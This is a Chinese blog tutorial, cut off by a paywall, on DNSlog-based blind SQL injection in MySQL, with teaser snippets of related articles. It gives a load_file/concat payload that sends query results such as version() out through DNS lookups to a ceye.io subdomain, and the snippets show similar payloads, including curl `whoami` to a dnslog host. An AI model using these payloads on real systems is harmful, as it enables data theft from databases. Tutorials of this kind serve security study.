dnslog盲注原理

最新推荐文章于 2024-05-14 14:24:19 发布
最新推荐文章于 2024-05-14 14:24:19 发布
阅读量1.8k 收藏 7
点赞数
分类专栏: SQL注入学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40939688/article/details/104945434
版权

Dnslog盲注原理

布尔盲注和时间盲注相当于猜单词的游戏,我们需要对每一位逐步的猜测,效率很低,需要发送很多的请求进行判断,很可能会触发安全设备的防护
我们需要一种方式能够减少请求,直接回显数据——Dnslog注入
Dns在解析的时候会留下日志,通过读取多级域名的解析日志,获取请求信息

Dnslog盲注方法

登录http://ceye.io/网站并注册,得到属于自己的identifier
先尝试在终端运行curl dnslog.4ke30o.ceye.io
在这里插入图片描述
在这里插入图片描述

Mysql load_file()函数可以发起请求,LOAD_FILE()函数操作需要用户具有FILE权限
构造语句,利用load_file()函数发起请求,使用Dnslog接收请求,获取数据
只能在windows系统下使用load_file()发起请求,在Linux环境下不能使用load_file()发起请求
使用语句select load_file(concat('\\\\',(select version()),'.mysql.4ke30o.ceye.io\\abc'))
在使用前务必记得设置secure_file_priv为"",我使用的是PHPstudy集成环境,所以访问http:/

最低0.47元/天 解锁文章
小冉要开心
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DNSlog原理
sjp_1996的博客
04-20 3200
DNSlog原理及实验 遵守我国网络安全法,仅用于渗透测试交流学习。 DNS解析过程 用户输入域名,浏览器知道是域名,然后通过DNS解析为IP地址,最后浏览器通过IP地址访问服务器。IP地址与域名是应是一对多映射的关系。 DNSlog的产生 DNS在解析的过程中产生日志文件,这些日志文件记录了访问时间、域名、IP地址等信息内容。 实验 1、公共DNS免费平台:www.DNSlog.con,点击GetSubDomain,会随机生成一个域名。 此时打开CMD,用ping命令,ping通这个域名。因为我的
dnslog server
09-08
在本文中,我们将深入探讨DNSlog Server的工作原理、用途以及如何利用它来提升网络安全。 **DNSlog Server的工作原理** DNS(Domain Name System)是互联网的重要组成部分,负责将域名转换为IP地址。DNSlog Server...
【渗透测试】DNSLog
ssrf
10-25 3754
目录 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、p
dnslog外带是什么
最新发布
来而不往非礼也
05-14 1028
在看hw面经的时候发现了dnslog外带的相关的知识点,有点迷惑,所以写下这篇文章记录,方便日后查阅。
mysql数据库中的骚姿势-dnslog原理
m0_46304840的博客
05-27 2356
前言 我以为我写过dns入了,结果我心血来潮看看博客,发现我居然还没有写 那么我就写一下 0x01.Dns原理 什么是dns? 例子:我们去访问 www.baidu.com,这时候dns会吧 www.baidu.com 这个域名转换为 IP地址 Dns其实就是负责把域名转换为IP地址 如果还不懂的话点击 点击这里查看 Dns在域名解析时会留下域名和解析ip的记录,利用这点我们可以使用Dnslog(日志)记录显示我们的 入结果 dnslog原理 通过子查询,将内容拼接到域名内,让load_f
SQL入学习-Dnslog
笑花大王
02-17 665
1.基础知识 1.DNS DNS(Domain Name System,域名系统),因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。通过主机名,最终得到该主机名对应的IP地址的过程叫做域名解析(或主机名解析)。DNS协议运行在UDP协议之上,使用端口号53。在RFC文档中RFC 2181对DNS有规范说明,RF...
DNSLog原理及代码实现
0of_blog
08-04 4716
自实现DNSLog服务器的意义及作用: 一些公共DNSLog服务可能已进入防火墙黑名单。不依赖他人服务器,增加可靠性。 结合自己的漏洞扫描工具,更定制化修改和部署DNSLog API。达到更高的效率。 附加实现DNS重绑定攻击等其他功能 熟悉DNSLog底层技术原理......
DNSLog-Platform-Golang:DNSLOG平台golang一键启动版
04-02
DNSLog-平台-Golang相信DNSLog平台已经是安全从业者的标配。而公开的DNSLOG平台域名早已进入流量监控设备的规则库。同时也有重大问题值得关。于是撸了(凑了)一个一键建造Dnslog平台的golang版本。可以使用其一键...
无回显漏洞测试及SSRF辅助平台提供DNSLOG,HTTPLOG等功能
01-20
平台使用Java编写,提供DNSLOG,HTTPLOG等功能,辅助渗透测试过程中无回显漏洞及SSRF等漏洞的验证和利用。 主要功能 DNSLOG HTTPLOG 自定义DNS解析 DNS Rebinding 自定义HTTP Response(Response内容、状态码、Header...
dnslog:简约的 DNS 日志记录工具
05-31
捕获所有 DNS 流量并将其文本表示(以压缩形式)存储到/var/log/dnslog/<date>.log.gz 。 创建用于网络取证目的。 $ zcat /var/log/dnslog/2018-07-12.log.gz | head 00:00:00.001595 R A 192.168.107.168 192....
DNS欺骗原理及其防御方案
09-28
DNS欺骗 原理 防御方案 技术理论 供参考
SQL入之DNS
SDM_JH的博客
07-28 286
一、准备一个自己的域名 利用DNS进行sql需要一个拥有可以修改dns权限的域名,然后需要在你的DNS服务器上把需要入的域名委托到攻击机上,也就是当请求你域名中的子域的解析请求都会解析到攻击机,然后我们在攻击机监听53 端口即可。 二、构造入语句 入语句:http://域名/test.php?user=root' and load_file(concat('\\\\',(select database()),'添加的子域名\\aaa'))# 可以利用sqlmap中的dns.py脚本监听53端
SQL入漏洞-利用DNS进行
HacHunter的博客
03-23 508
在windows下面,可以通过网络路径(NUC)来访问其他主机的资源。其格式如下: \\servername\sharename,其中servername是服务器名。sharename是共享资源的名称。 其中servername可以是主机IP或者域名 当servername是域名的时候,会通过DNS 把域名把dns解析为IP地址。 DNS 服务器:win2003,IP:10.1.1.31添加一条主机记录baidu.com 10.1.1.31 子域名test 委托到10.1.1.251 We..
DNSLog
errorr0
06-27 1142
DNSLog入漏洞
利用DNS日志进行MySQL
weixin_30793643的博客
06-10 60
0x01 技术原理 这里是利用load_file这个函数利用smb请求方式请求域名机器下的一个文件,由于计算机对该域名不熟悉所以需要优先请求DNS,所以我们通过DNS日志记录中的内容来获取回显。解决了回显的问题,或者是时间入判断的问题。 熟悉MySQL的人都知道,这个利用有几个要求或者说是限制条件 # 条件1 + 1、由于基于SMB请求,需要在Windows环境下 # 条件2 + 2、...
DNSLog漏洞探测(一)之DNSLog介绍
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-08 4897
DNSLog是一种基于DNS协议的信息收集技术,它可以用于网络安全领域的渗透测试、漏洞挖掘等方面。DNSLog原理是利用DNS协议的特性,将需要收集的信息编码成DNS查询请求,然后将请求发送到DNS服务器,最后通过DNS服务器的响应来获取信息。DNSLog的实现方式有很多种,其中最常见的是使用第三方DNS服务。DNSLog的优点是隐蔽性高,缺点是响应时间较慢和存在一定的误报率。
dnslog
weixin_33928137的博客
12-21 274
   使用Powershell反弹Meterpreter Shell cloudeye在windows下的应用 今天突发奇想的一个姿势,算不上什么技巧,分享一下吧。看到有人问过。http://zone.wooyun.org/content/27440其实很羡慕linxu的curl `whoami`.xxxxxx.dnslog.info这样去获取数据什么的。windows下...
dnslog原理
07-29
DNSLog入是一种利用DNS协议的安全漏洞进行攻击的方法。它利用了DNS服务器对于域名解析请求的处理方式,通过在恶意构造的域名中插入恶意代码,从而实现对目标系统的攻击或信息收集。 具体的原理如下: 1. DNS...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值